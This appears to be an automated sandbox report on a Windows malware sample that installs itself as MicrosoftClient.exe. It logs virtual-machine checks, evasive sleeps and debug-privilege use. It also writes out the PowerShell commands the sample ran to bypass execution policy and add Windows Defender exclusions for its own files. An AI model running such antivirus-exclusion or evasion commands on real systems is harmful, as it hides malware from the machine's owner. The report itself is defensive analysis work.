Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Memory allocated: 1450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Memory allocated: 1B020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 1160000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 2C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Window / User API: threadDelayed 9665	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3743	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6046	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7349	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2208	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7702	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1978	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7435
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2220

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe TID: 2348	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052	Thread sleep count: 7435 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208	Thread sleep count: 2220 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 612	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477

Source: 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BFBC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Queries volume information: C:\Users\user\Desktop\9RgE5uOJwX.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
